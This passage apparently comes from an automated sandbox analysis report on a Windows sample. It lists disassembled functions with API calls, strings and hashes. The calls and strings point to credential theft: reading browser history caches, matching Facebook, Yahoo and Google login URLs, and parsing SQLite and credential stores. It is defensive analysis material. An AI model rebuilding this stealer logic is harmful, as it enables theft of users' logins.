                                                                                                                                                                                                                                            • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                                                                            • String ID: visited:
                                                                                                                                                                                                                                            • API String ID: 1157525455-1702587658
                                                                                                                                                                                                                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                                                                            Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 free 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                            • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                                            • API String ID: 2804212203-2982631422
                                                                                                                                                                                                                                            • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                                                                                                                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                                                                            Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError free 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 free 812->819 813->812 819->797
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                                            • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                                                                            • String ID: |A
                                                                                                                                                                                                                                            • API String ID: 77810686-1717621600
                                                                                                                                                                                                                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                                                            Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                                                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                                                                            • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                                            • String ID: r!A
                                                                                                                                                                                                                                            • API String ID: 2791114272-628097481
                                                                                                                                                                                                                                            • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                                            Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                                            • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                                            • API String ID: 2936932814-4196376884
                                                                                                                                                                                                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                                            Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                                            • String ID: BIN
                                                                                                                                                                                                                                            • API String ID: 1668488027-1015027815
                                                                                                                                                                                                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                                            Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memcpy
                                                                                                                                                                                                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                                            • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                                            Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                                            • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                                            • String ID: $0.@
                                                                                                                                                                                                                                            • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                                            Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2941347001-0
                                                                                                                                                                                                                                            • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                                            Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                            • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                            • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 669240632-0
                                                                                                                                                                                                                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                                            Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                                            • String ID: "%s"
                                                                                                                                                                                                                                            • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                                            Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2911713577-0
                                                                                                                                                                                                                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                                            Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memcmp
                                                                                                                                                                                                                                            • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                            • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                                            • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                                            Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
